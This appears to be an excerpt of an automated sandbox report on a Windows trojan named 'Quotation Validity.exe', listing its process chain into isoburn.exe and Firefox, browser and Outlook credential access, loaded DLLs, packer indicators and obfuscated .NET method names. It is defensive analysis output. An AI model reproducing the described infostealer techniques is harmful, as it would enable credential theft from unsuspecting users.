                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: String function: 013EEA12 appears 86 times
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: String function: 013C7E54 appears 89 times
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: String function: 013FF290 appears 105 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04E5B970 appears 275 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04EB7E54 appears 95 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04EDEA12 appears 86 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04EEF290 appears 105 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04EA5130 appears 36 times
                      Source: Quotation Validity.exe, 00000002.00000002.1306858110.0000000005E70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000002.00000002.1307325676.0000000007800000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000002.00000002.1301683641.00000000015CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000002.00000000.1266184725.0000000000FBE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWlUx.exeF vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000002.00000002.1302792187.000000000345F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000002.00000002.1304383936.0000000004419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000009.00000002.1698898912.0000000000EE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs Quotation Validity.exe
                      Source: Quotation Validity.exe, 00000009.00000002.1699227105.000000000146D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation Validity.exe
                      Source: Quotation Validity.exeBinary or memory string: OriginalFilenameWlUx.exeF vs Quotation Validity.exe
                      Source: Quotation Validity.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Quotation Validity.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: _0020.SetAccessControl
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: _0020.AddAccessRule
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, gaISc3smJkRod0afuE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, gaISc3smJkRod0afuE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: _0020.SetAccessControl
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, L0AQhRXo4qQe2hqTnb.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@19/12
                      Source: C:\Users\user\Desktop\Quotation Validity.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation Validity.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user\AppData\Local\Temp\l420377xJump to behavior
                      Source: Quotation Validity.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Quotation Validity.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: isoburn.exe, 0000000C.00000003.1891302974.0000000003155000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1892342599.0000000003176000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3730207488.0000000003180000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3730207488.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3730207488.0000000003176000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Quotation Validity.exeReversingLabs: Detection: 68%
                      Source: unknownProcess created: C:\Users\user\Desktop\Quotation Validity.exe "C:\Users\user\Desktop\Quotation Validity.exe"
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess created: C:\Users\user\Desktop\Quotation Validity.exe "C:\Users\user\Desktop\Quotation Validity.exe"
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess created: C:\Users\user\Desktop\Quotation Validity.exe "C:\Users\user\Desktop\Quotation Validity.exe"Jump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Quotation Validity.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: Quotation Validity.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Quotation Validity.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: isoburn.pdb source: Quotation Validity.exe, 00000009.00000002.1698898912.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730617348.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: isoburn.pdbGCTL source: Quotation Validity.exe, 00000009.00000002.1698898912.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730617348.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KnETAajUsFuuTQ.exe, 0000000B.00000002.3724874512.000000000056E000.00000002.00000001.01000000.0000000C.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771056364.000000000056E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: Quotation Validity.exe, 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1699007606.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1706016321.0000000004C84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Quotation Validity.exe, Quotation Validity.exe, 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000C.00000003.1699007606.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1706016321.0000000004C84000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, L0AQhRXo4qQe2hqTnb.cs.Net Code: FO2u76E0uu System.Reflection.Assembly.Load(byte[])
                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, L0AQhRXo4qQe2hqTnb.cs.Net Code: FO2u76E0uu System.Reflection.Assembly.Load(byte[])
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 2_2_078AC1EF push 0000005Dh; ret 2_2_078AC19A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004148DC pushad ; retf 9_2_004148E4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_004032C0 push eax; ret 9_2_004032C2
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00426AB3 push es; retf 9_2_00426B5B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00418ABC push ebx; ret 9_2_00418ABD
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00413BE9 push 00000025h; iretd 9_2_00413BF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00417C83 push edx; retf 9_2_00417CC2
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00417D07 push edx; retf 9_2_00417CC2
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00401DE9 pushad ; retf 9_2_00401E17
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00404E1D push 2A89E27Eh; ret 9_2_00404E25
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00415625 push ebp; retf 9_2_00415626
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00404F61 push ss; ret 9_2_00404F62
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013709AD push ecx; mov dword ptr [esp], ecx9_2_013709B6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_04E609AD push ecx; mov dword ptr [esp], ecx12_2_04E609B6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A603EA push EBE9D31Fh; retf 12_2_02A60403
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A51619 pushad ; retf 12_2_02A51621
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A637F0 push es; retf 12_2_02A63898
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A557F9 push ebx; ret 12_2_02A557FA
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A60406 pushfd ; iretd 12_2_02A60407
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A5745E push ebx; ret 12_2_02A5745F
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A54A44 push edx; retf 12_2_02A549FF
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A41B5A push 2A89E27Eh; ret 12_2_02A41B62
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A57887 push cs; retf 12_2_02A57888
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A5D985 push edi; iretd 12_2_02A5D987
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A549C0 push edx; retf 12_2_02A549FF
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A609C9 push esp; retf 12_2_02A609CA
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A50926 push 00000025h; iretd 12_2_02A5092D
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A63C90 push edi; iretd 12_2_02A63DB5
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A41C9E push ss; ret 12_2_02A41C9F
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A55DB1 push ds; retf 12_2_02A55DB4
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A55D73 push 00000035h; iretd 12_2_02A55D7E
                      Source: Quotation Validity.exeStatic PE information: section name: .text entropy: 7.844873716049532
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, kYw2t6Cujk8r0xkKn5A.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QFc4LHkEsY', 'X0W4h5rrRu', 'R7W4koqfUj', 'feu44ynFoc', 'hac4tKk2LM', 'daZ4mT9FNL', 'DwK4DpbMXZ'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, h5HxGKUEXWrqmUk5Dl.csHigh entropy of concatenated method names: 'zNZvlgPQfO', 'UCRvyCZZfX', 'U7Ov7pD7Mu', 'rhEvQ6XISq', 'x03vN3Su7F', 'J8dv6mx1dv', 'mRevquXOv8', 'H77vsQrkME', 'bpWv5Ymbel', 'XuQvA825f9'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, I257RiJPIrWR2xy1FE.csHigh entropy of concatenated method names: 'ToString', 'MLeExCwhif', 'EuWEZe4qLP', 'U4vE8KRHj2', 'SdTEg45lLb', 'LYLEiAs9gc', 'YUYErR0Yat', 'tjrEPx8dfU', 'sycEcRc19E', 'H91EU2gQ79'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, Od6YwxKt7YrNrBL1cF.csHigh entropy of concatenated method names: 'RjiVjNP2qo', 'RavVpu1P5n', 'tK41F1uMKl', 'yFU1CWbEvA', 'cJQVxMXlBm', 'IobVOFgjVa', 'j3CVSWIuTO', 'y7gVeZr9uV', 'vZ4VBt17qX', 'nSUVJrCrEY'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, amviEfW6dl31nSNBN7.csHigh entropy of concatenated method names: 'WeT78Was3', 'lZWQBNIoA', 'iwm69PF2v', 'JuRqPgjtO', 'SYO5mseMy', 'nRLAmCEm4', 'WhjrinmLAoNEkgemqe', 'tmOur6YFagY79lsRcx', 'Q0B19wNtX', 'q3ahuIedI'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, t5MOqWCFf9eOYvjVC8u.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RVVhxGPv6X', 'L5hhOZvROp', 'FZrhSIhTOB', 'RIXhe8RJtO', 'OYohBZVQXX', 'LoghJiUPqa', 'Vs3haRuO67'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, L0AQhRXo4qQe2hqTnb.csHigh entropy of concatenated method names: 'PaGofPJ7f2', 'pPXoYV4bkg', 'qNRoGq0Ci4', 'e7jonVI7Yj', 'iC5oMZY7iE', 'hOto3htoaL', 'HR8ovVRQnL', 'uDioX07isj', 'yFwowbIvDV', 'YCioIQI1SJ'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, YANjrvzfk5eqILVaI9.csHigh entropy of concatenated method names: 'qiKh6GodFu', 'Oplhsgr9Qf', 'QWNh5Cxwe0', 'YS4h22yIN8', 'bjDhZeiKBu', 'HBBhg5hJQA', 'VyshiVqmho', 'yIDhDwCu4u', 'ecQhlTyT2p', 'nk4hyt80aZ'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, pvnc8JpnNdIMnHG5MX.csHigh entropy of concatenated method names: 'C79hnAqjuM', 'ThuhMFFuDu', 'Ypvh3FLmOh', 'xGshvRZf9i', 'i7fhLoJTKd', 'svwhX64cVa', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, lZXfE1AcaEeNcwwM7x.csHigh entropy of concatenated method names: 'yDfMN8Y8K8', 'FkIMqn3dux', 'idFn8NDaq2', 'tntngXVK8v', 'Hpqni6OZq1', 'JyYnr74Vdj', 'VgOnPCMiAw', 'nRgncvHsGR', 'b12nUT9Yjy', 'KLXnTBTiD8'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, urntG10VLDyIdTfQDm.csHigh entropy of concatenated method names: 'iTaL2dgatw', 'iIlLZjRrth', 'cLhL8VukWU', 'SFwLgPXMik', 'oOCLiZGFfF', 'pveLrWhtCr', 'FI8LPfEO7C', 'xPZLc3ETH6', 'GpFLUiJHco', 'HlTLTorFVZ'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, KnnK8XSCKvQEo4K9Uf.csHigh entropy of concatenated method names: 'qmyHsYjqKP', 'T1NH5yjl7X', 'WaZH2wlkxo', 'sgWHZqN6uf', 'DTqHgHoRyS', 'RA5HicLrjL', 'esVHPkJOom', 'DXoHccn0oy', 'XLmHT4KUUy', 'ii1HxQGGVB'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, N5pa6mbrEKLlhI1c1D.csHigh entropy of concatenated method names: 'JVMLd1ryON', 'qCDLVP57qy', 'v51LLHRwrx', 'jh4Lk9fPZw', 'Sn6LtZXYRK', 'n9wLDyrx7m', 'Dispose', 'oRN1YCCLjh', 'nlh1GSDZjL', 'lYQ1nDalUY'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, nQxcW3u1CDaQqJLW6T.csHigh entropy of concatenated method names: 'rtGCvaISc3', 'vJkCXRod0a', 'hymCIvFFAB', 'n4DC9jwZXf', 'lwMCd7x3To', 'TGFCElARYK', 'AQgAG07txruFsR6mn8', 'gfRhVbPVT7VDnLVSVy', 'aypCCMfXi0', 'pm8CoR3VLo'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, iToaGF2lARYKayyNlK.csHigh entropy of concatenated method names: 'BLf3fRLKrY', 'rk33GHQqXB', 'kWp3MpuHyw', 'Kgc3v5G6h1', 'dVs3XVOGDX', 'FyHMRrJ7dK', 'NWpMK3g7ud', 'suFMb8l04w', 'VjWMjrI4aQ', 'G9cM0a8p4x'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, gaISc3smJkRod0afuE.csHigh entropy of concatenated method names: 'wMqGe8EBRd', 'yalGBqfq3P', 'Fb4GJcP8Pk', 'jEnGaEsk6k', 'JLnGRCNQSi', 'QLBGKVtn2v', 'KfTGbp33eh', 'sWTGj2xd1R', 'M7cG0DTfcZ', 'MX8Gpkre3u'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, oN2grECCK4gO17L0FAy.csHigh entropy of concatenated method names: 'Rdthp9scwo', 'fc2hzZp0lF', 'VArkFCQrvj', 'Vp4kC5w2si', 'uKOkWYfLZA', 'c6ckoAxE0n', 'cm1ku6YXev', 'ysJkf1oQ3l', 'nsikYLIldq', 'sk1kGZWDep'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, VoqGq3ajNAWF6jOayP.csHigh entropy of concatenated method names: 'hrDVIyFPjI', 't9VV9UneKS', 'ToString', 'R2GVY7SvWQ', 'FcYVGZjn6E', 'sCRVnSBILr', 'oW6VMwRq0n', 'QPDV3Ptom8', 'GbYVvgFli6', 'IrfVXtFUF7'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, IfUyg8GCniJR50PisR.csHigh entropy of concatenated method names: 'Dispose', 'ULlC0hI1c1', 'A4pWZMI7ZP', 'tt6ZmUqLQ1', 'wy5Cpf7nZy', 'aMNCzaoUre', 'ProcessDialogKey', 'hTtWFrntG1', 'qLDWCyIdTf', 'ADmWWEvnc8'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, MNysO1PmBFCOrx1ULk.csHigh entropy of concatenated method names: 'I1XvYVLcQX', 'WBovn5K6wu', 'yAOv3vs632', 'tqf3ptcDhw', 'Hei3zQZvuq', 'PAVvFiFAyE', 'wY7vCh7uq1', 'vUqvWYudPq', 'pwBvobVpSL', 'orgvuul0VI'
                      Source: 2.2.Quotation Validity.exe.7800000.6.raw.unpack, l8heFM5ymvFFABH4Dj.csHigh entropy of concatenated method names: 'kkLnQ72aow', 'BB0n6bBCUU', 'GU5nsvxkyY', 'bdWn5qD7QV', 'Vhjnd7ddQh', 'VhqnEheWRd', 'oISnVODh8i', 'qByn1JaLCu', 'CHRnLvHqvP', 'LP0nhmuyP1'
                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
